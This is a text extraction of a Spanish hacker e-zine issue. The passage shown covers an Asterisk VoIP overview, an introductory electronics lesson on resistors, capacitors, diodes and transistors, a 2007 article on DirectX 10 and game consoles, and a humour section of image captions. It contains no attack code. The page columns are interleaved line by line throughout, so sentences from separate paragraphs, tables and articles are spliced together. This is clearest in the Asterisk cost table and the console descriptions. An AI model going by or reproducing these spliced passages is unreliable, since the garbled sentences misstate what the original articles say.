tamaño del proyecto y el coste que podría haber
Competitividad en coste alcanzado en caso de haber sido construido como
software propietario.
No solo por ser un sistema de código abierto (Open
Source) sino gracias a su arquitectura hardware:
utiliza plataforma servidor estándar (de propósito no Resumidamente, en el cálculo de costes se han
específico) y tarjetas PCI para los interfaces de tenido en cuenta dos factores, el salario medio de
telefonía, que por la competencia del mercado se un desarrollador, cifrado en 56.286 $/año, y el
han ido abaratando progresivamente. coste que toda empresa tiene que afrontar,
además de los sueldos de los programadores,
Interoperatibilidad y Flexibilidad para lanzar un producto al mercado.

Asterisk ha incorporado la mayoría de estándares de Estado actual de Asterisk


telefonía del mercado, tanto los tradicionales (TDM)
con el soporte de puertos de interfaz analógicos
(FXS y FXO) y RDSI (básicos y primarios), como los Página web http://www.asterisk.org/
de telefonía IP (SIP, H.323, MGCP, SCCP/Skinny). Eso
le permite conectarse a las redes públicas de
telefonía tradicional e integrarse fácilmente con Inicio del proyecto 1999
centralitas tradicionales (no IP) y otras centralitas IP.
Estado actual
Version 1.4.0 - Diciembre
La versión estable de Asterisk está compuesta por Versión analizada
2006
los módulos siguientes:

• Asterisk: Ficheros base del proyecto.


Líneas de código
250.463
• Zaptel: Soporte para hardware. fuente
Drivers de tarjetas.

• Addons: Complementos y añadidos Esfuerzo estimado de


del paquete Asterisk. Opcional. desarrollo
66,03 - 792,30
(persona/año -
• Libpri: Soporte para conexiones persona/mes)
digitales. Opcional.

• Sounds: Aporta sonidos y frases en Estimación de tiempo


diferentes idiomas. 2,63
(años)
Cada módulo cuenta con una versión estable y una
versión de desarrollo. La forma de identificar las
Estimación de
versiones se realiza mediante la utilización de tres
número de
números separados por un punto. Teniendo desde el 25,08
desarrolladores en
inicio como primer número el uno, el segundo
paralelo
número indica la versión, mientras que el tercero
muestra la revisión liberada. En las revisiones se
llevan a cabo correcciones, pero no se incluyen
Coste total estimado 8.919.128 $
nuevas funcionalidades.
CUH e-zine 2ª edicion Asterisk

TARJETAS DE COMNICACIONES

PARTES DE ASTERISK

COMPONENTES DE ASTERISK
SOLUCIONES ASTERISK

EQUIPAMIENTO PARA VoIP

Espero les haya gustado.


En la siguiente entrega hablaremos de la instalación
de la herramienta…..

www.hackeruna.com
TERMINALES
Escrito por JUCA
CUH e-zine 2ª edicion Introducción a la Electrónica

Introducción a la Electrónica By Elektro


Resistores:

Su símbolo es:
Son materiales conductores, pero no tan buenos
como el cobre u otros conductores que conocemos,
Hola, gracias por estar de vuelta por mi sección! por lo que tienen la propiedad de “limitar” la
Bueno, en la anterior entrega aprendimos un poco circulación de los electrones a través de ellos. Es
sobre los principios físicos que rigen la electricidad, decir, un resistor hace que los electrones reduzcan su
conceptos necesarios para poder adentrarnos más velocidad al atravesarla y según lo que vimos antes
profundo en el fascinante mundo que existe dentro esto es lo mismo que decir que limitan la “corriente
de nuestras PCs y casi en todo lo que nos rodea hoy eléctrica” del circuito en el cual se los incorpora.
en día.

En esta figura podemos ver el aspecto de un resistor


y su codificación, siendo componentes pequeños y
muchas veces ubicados en lugares de no muy fácil
acceso, los resistores usan para identificar su valor
un código de colores, que está distribuido como se
ve en la figura y que es el siguiente:

Esta vez vamos a aprender los componentes básicos El dorado y el plateado se usan para indicar la
que existen en todo circuito electrónico, puede que tolerancia.
sea un poco tedioso, pero les prometo que mucho Veamos un ejemplo del uso de los colores, si nos
más divertido que lo que vimos antes y más que eso, encontramos con una resistencia que es Amarilla,
les prometo que después de esto empezaremos a ver Violeta, Marron y Dorada su valor será 470 (el tercer
cosas más “concretas” como aprender un poco sobre color nos da la cantidad de ceros) y el dorado nos
microcontroladores y armamos algún proyecto, pero dice que tiene una tolerancia de 5 %, es decir su
como dije, eso en la próxima entrega. valor es de 470 ohms con un error del 5 % en su
Ahora bien, vamos a los componentes más básicos valor real. (puede tener entre 446,5 y 493,5 ohms)
que podemos encontrar, estos son los Resistores, Veamos una aplicación del resistor, por ejemplo
Capacitores e Inductores, estos últimos si bien están limitar la corriente que entra a un led (las lucecitas
por muchos lugares no los vamos a usar por ahora que vemos en todos lados, ya lo explicamos a el
así que solo los vamos a nombrar muy por arriba. también)
Siendo que el led por operar con alrededor de 1,5 v
Empecemos: no puede ser conectado directamente a la batería de
9 v porque sería destruido, es que se coloca
intercalado (se dice que está en “serie”) en el circuito
CUH e-zine 2ª edicion Introducción a la Electrónica

un resistor: compuesto por dos placas conductoras separadas


por un dieléctrico, o capa de materia no conductor.

Así se ve un capacitor electrolítico:

El resistor limita la corriente, y sobre sus bornes se Inductores:


genera una caída de tensión, con lo que la tensión Casi no los vamos a usar, al menos no el el futuro
de la batería , menos la que cae sobre el resistor, cercano, así que solo diremos que así como el
tiene que ser 1,5 v de manera de garantizar el buen capacitor se opone a cambios bruscos de tensión, el
funcionamiento del led. inductor se opone a cambios bruscos en la corriente
Con los resistores entra en escena la ley más que lo atraviesa Se usa muchas veces en fuentes de
importante y que ya hemos visto, la Ley de ohm: alimentación y más que nada en circuitos de
I=E/R radiofrecuencia, donde su función es la de sintonía
(olvídense de esto, por ahora y quién sabe si por
Más adelante, cuando pongamos manos a la obra mucho tiempo).
repasaremos el funcionamiento del resistor, no se
preocupen!!!

Capacitores:

Su símbolo es:
No vamos a ahondar como con el resistor, diremos
que el capacitor almacena energía eléctrica, es
decir, se conecta al circuito, y se carga, para luego
ser capaz de entregar esa carga cuando lo
necesitemos, podemos pensar que se carga como
una pila, pero su carga es efímera en el tiempo y
cumple otras funciones, además de funcionar en
Semiconductores:
Bueno, ya vamos llegando a los componentes que
base a principios diferentes a los de la pila.
todos queremos conocer, los que están basados en el
También podemos describir su funcionamiento
silicio entre otros materiales.
diciendo que el capacitor se opone a cambios
Entrar en la teoría de los semiconductores, en cómo
bruscos de tensión y es por eso que es tan utilizado
funcionan y que sucede en el interior de los mismo
para el filtrado de los voltajes en múltiples
esta mas allá del alcance que se le quiere dar a
aplicaciones. (Un circuito que a su entrada tiene un
estos artículos, así que vamos a limitarnos a su
capacitor no se verá afectado por un pico en la
utilización para más adelante poder incluirlos en
tensión que lo alimenta)
nuestros proyectos.
La propiedad de estos componentes es la capacidad
eléctrica y su unidad el Faradio (F)
Empecemos por el más elemental:
Los hay más comúnmente de material cerámicos,
normalmente llegan a valores tan bajos hasta el
orden de los picofaradios (1x10E-12 F) y
Diodos:
Su propiedad es la de dejar pasar la corriente
electrolíticos (hechos de
eléctrica en un sentido y no en el opuesto, es decir,
exteriormente de aluminio) que
en un cable la corriente puede ir en un sentido u
llegan hoy en dia a valores de
otro, dependiendo solo de que lado pongamos la
hasta 1 F
fuente (por ejemplo la batería) en cambio cuando
El capacitor elemental está
tenemos un diodo, este dejara pasar la corriente
CUH e-zine 2ª edicion Introducción a la Electrónica

solo desde su Ánodo (A) hacia su Cátodo (C ), PNP. En electrónica digital, es decir dentro del
permitiéndonos así “controlar” la corriente de una mundo de los 1s y 0s, el transistor se la pasa
manera que hasta ahora ninguno de los funcionando como una interruptor, pasando de
componentes que conocemos nos había permitido. conducir a no conducir, es decir de 1 a 0
Su símbolo es el siguiente: Cuando la señal que tenemos en B es una señal
variable el transistor puede utilizarse para
Amplificarla, es decir obtener entre C y E una copia
de la señal en B, pero de mayor amplitud, este modo
es más complejo de analizar, pero es el que rige el
funcionamiento de los amplificadores de audio y de
todo tipo.
Y su aspecto externo es

El diodo más famoso en los últimos tiempos es el


diodo Led, Light Emitting Diode, o traducido, Diodo
emisor de luz. Estos diodos, funcionan como los
anteriores, con la diferencia de que al circular por
ellos una corriente eléctrica, emiten luz, dependiendo Los semiconductores serán un tema recurrente y
el color de la misma, no del plástico del cual está cada vez que sea necesario repasaremos su
hecho el exterior del led, sino del tipo de material principio de funcionamiento, a no asustarse si no se
semiconductor del que está compuesto. Su aspecto entendió todo, espero que si hayan entendido algo!
es el siguiente:

Y podemos encontrarlos en todos lados hoy en día,


desde la luz de numlock de nuestro teclado, hasta Bueno, en la próxima empezamos con los
los semáforos de las calles (compuestos por miles de microcontroladores para ver como todo esto puede
leds) cobrar forma y ponerse a funcionar.
Gracias por su atención y hasta la próxima
Transistores:
Fueron los que revolucionaron todo en el mundo de
la electrónica, es el antes y el después de su
invención, en 1947, sin ellos, nada de lo que vemos a
nuestro alrededor seria igual…. Bueno, si, nosotros
seriamos iguales y quizás los muebles también ;-)
Los hay NPN y PNP, donde lo que cambia es la
polaridad de las tres patas (NPN negativo-positivo-
negativo y lo contrario para el PNP)

El transistor es como interruptor electrónico, modo en Elektro


el cual, la Base (B) del transistor al recibir una
tensión permite circular corriente entre Colector (C) y
Emisor (E), y entre E y C para el caso del transistor
CUH e-zine 2ª edicion Multimedia (Juegos)

Multimedia (Juegos) By MadMouse

Multimedia (Juegos)

Copyright (c) 2007 MadMouSe.


Permission is granted to copy, distribute and/or Figura2
modify this document
under the terms of the GNU Free Documentation
License, Version 1.2
or any later version published by the Free
Software Foundation;
with no Invariant Sections, no Front-Cover Texts,
and no Back-Cover Texts.
A copy of the license is included in the section
entitled "GNU
Free Documentation License".

Hola, soy MadMouse y en esta edición de CUH E- Figura 3


ZINE les voy a hablar sobre la tecnología
relacionada a los juegos de ultima generación,
DirectX y la guerra de consolas que ha resurgido
últimamente entre Sony y Nintendo y a la cual se ha
sumado Microsoft con sus nuevas Xbox y Xbox 360.

Un análisis detallado sobre DirectX 10

Figura 4

Imagen comparativa de dos motores gráficos que


utilizan DX 10: figuras 1 y 2 “Unreal Engine 3”,
Figuras 3 y 4 derecha “Cry Engine 2”.

Empecemos por el punto que todo gamer busca:


calidad grafica.
Figura1 Con la llegada de Windows Vista y el afamado
DirectX 10, una nueva era de efectos especiales ha
dado comienzo; sombreado en tiempo real, ciclos de
día/noche dinámicos, ambientes totalmente
interactivos con niveles de física avanzada,
partículas tridimensionales de alta resolución,
simulación de luz solar (también en tiempo real),
CUH e-zine 2ª edicion Multimedia (Juegos)

nubes volumétricas, son solo algunos de los muchos


ejemplo a citar de lo que es posible realizar con
DX10 como ha demostrado el equipo de Crytek con
su “Cry Engine 2”.

A continuación voy a detallarles los puntos fuertes y


débiles de cada consola para que los que todavía
no posea una y estén pensando en adquirirla tengan
bases en que basar sus decisiones.

Pero a que costo? Principalmente, para poder utilizar


DirectX 10 necesitamos Windows Vista, la ultima
versión de Windows y una de las mas criticadas por
usuarios avanzados debido a su costo, falta de
innovación, mal manejo de recursos de sistema y
altos requerimientos de hardware, solo para poder
mantener al SO funcionando… Microsoft “obliga” a
sus clientes a actualizar su SO y su hardware si es
Consolas de sexta generación (La generación
que quieren instalar DX10 en su sistema, algo que
actualmente más asentada, ya que la generación 7
generalmente implica un gasto superior a los 2000U$
todavía no ha alcanzado grandes escalas, sobre
si es que no se posee ya un equipo capas de alojar
todo en Sudamérica)
Windows Vista con sus mínimas especificaciones que
superan a muchos de los programas que mas
PlayStation 2: La consola líder indiscutible de la
recursos físicos requerían en XP, además hay que
sexta generación es la de Sony. La PS2 posee una
sumar la licencia de Vista, y gastos varios como los
gran cantidad de títulos y sagas propias de la PSone
juegos tengamos en mente.
(PSX) en conjunto con periféricos (principalmente los
controles) que siguen los rasgo de su ancestro, lo
Si el valor monetario no es un impedimento, queda a
que ha sido tomado bien por fanáticos de todo el
su disposición el probar DX 10 por si mismos,
mundo, ya que la PS2 parece una versión mejorada
aunque les recomiendo por lómenos esperar la
de la primera PlayStation, pudiendo esta reproducir
salida de la versión 10.1 de DirectX (de momento
los mismos juegos y añadiendo una cantidad de
fechado para enero del 2008) que incluirá
juegos de alta calidad como el “Metal Gear Solid 2:
correcciones importantes para el aprovechamiento
Sons of Liberty”, el “Grand Theft Auto: Vice City”, el
de sus valiosos recursos. Recuerden que la mayor
“Final Fantasy X” o el “Dragon Ball Z: Budokai
parte de los usuarios de XP todavía no tienen planes
Tenkaichi 2”. El principal problema de la PS2 es su
de emigrar a Vista y seguirá explotando los limites
fragilidad y su amplia gama de problemas técnicos
de su sistema esperando una versión de DX 10 para
que van desde incompatibilidad de juegos entre
este o apoyándose en OpenGL, el único motor
distintos modelos, averías generales en el lente del
grafico capas de ponerse a la altura de DX en
láser o sobrecalentamiento.
popularidad y utilidad y que ya ha sido incorporado
entre muchos juegos de ultima generación y ha
Xbox: La única otra alternativa real que puede
demostrado ser superior a DX 9 en muchos casos.
satisfacer nuestras necesidades dentro de las
consolas de la sexta generación es la de Microsoft,
La Guerra de las consolas
siendo esta una de las que poseen las mejores
prestaciones de hardware de esta generación y
Desde hace años que existe una batalla entre las
también con una gran gama de títulos interesantes.
principales empresas productoras de consolas: Sony
y Nintendo como principales lideres de la industria,
sumándose Microsoft al tren de las consolas con su
Xbox, una gran consola de sexta generación que
compite con la PS2, el GameCube y en menor
medida con el ya casi olvidado Dreamcast de SEGA.
CUH e-zine 2ª edicion Multimedia (Juegos)

interesantes opacan su gran hardware, el soporte


para discos Blu-Ray y su gran definición (en
conjunción con discos rígidos de fabrica de asta 80
Gigabytes) la hacen una consola ideal para los que
disfruten de la multimedia aunque esto no basto para
que fuera arrasada en el mercado. Como todas las
consolas de séptima generación, cuenta con
conexión a la red pero a diferencia de la Nintendo
WII o la Xbox 360, con la PS3 es posible usar
sistemas operativos alternativos sin hacer uso de
ningún hack ni método ilegal, su hardware permite
Los amantes del RPG podrán disfrutar de juegos instalar distribuciones Linux sin problemas y correr
como “Fable: The lost Chapters” juego en el que en esta amplia gama de emuladores.
encarnas en un niño y creces manipulando su destino
dependiendo de la naturaleza de tus acciones
podiendote convertirte en héroe o villano. En cambio,
si lo que les interesa es la acción online, tienen a su
disposición “Halo 2” y “Counter Strike” dos first
person shooters que les garantizan horas de
diversión mientras intentan escalar rangos de los
“ladder” que Microsoft tiene en su comunidad online
“Xbox Live”

Consolas de séptima generación

Nintendo WII: Nintendo vuelve al ataque con la


consola a la cabeza de la séptima generación,
parece que decidieron enmendar el terrible fracaso
que fue la GameCube y salir adelante con una
espectacular consola que atrae a todo tipo de Xbox 360: El principal atractivo de esta consola es
público debido a su versatibilidad. Los controles de su comunidad online, que se organiza de manera
la WII son inalámbricos, detectan el movimiento y la muy similar a la de la Xbox original, permitiendo a
aceleración en cualquier dimensión, muchos de sus los jugadores encontrar oponentes de su nivel
juegos basan su jugavilidad en este factor clave de fácilmente, descargar parches y actualizaciones
la consola y han logrado ganar la mayor parte del para los juegos, o incluir nuevos mapas y misiones,
mercado. ya sea comprándolos o ganándolos online. La Xbox
360 se ha ganado muchos fanáticos entre los adictos
a los FPS ya que dispositivos como auricurales,
micrófonos y teclados permiten una sensación
parecida a la de estar frente a una PC. Como si esto
no bastara, posee el almacenamiento más grande en
disco de todas las consolas de séptima generación
(en su versión “Elite”) para que guardemos juegos,
parches o música y videos.

Mandos especiales, como una espada y un escudo


para The Legend of Zelda: The Twilight Princesa han
sido manufacturados para ampliar la sensación de
realidad que proporciona el control de movimientos,
si lo que buscan es innovación y alejarse un poco de
la jugavilidad clásica de las consolas, con la WII van
a tener mas que suficiente.

PlayStation 3: Sony dio un paso en falso con esta


consola, un elevadísimo precio y pocos títulos
CUH e-zine 2ª edicion Off
Topic

Off topic - Humor By Editorial


Alimento para Spammers

Chistes Gráficos

Ctrl +Alt + Supr

Sql Injection

Bad Boy
CUH e-zine 2ª edicion Off
Topic

Php & MySql


Imágenes con doble sentido

Chistes picantes Curiosidades


CUH e-zine 2ª edicion Off
Topic

SexyMouse

Un real Geek

Programacion

Varias

Montajes Photoshop
CUH e-zine 2ª edicion Off
Topic

Vous aimerez peut-être aussi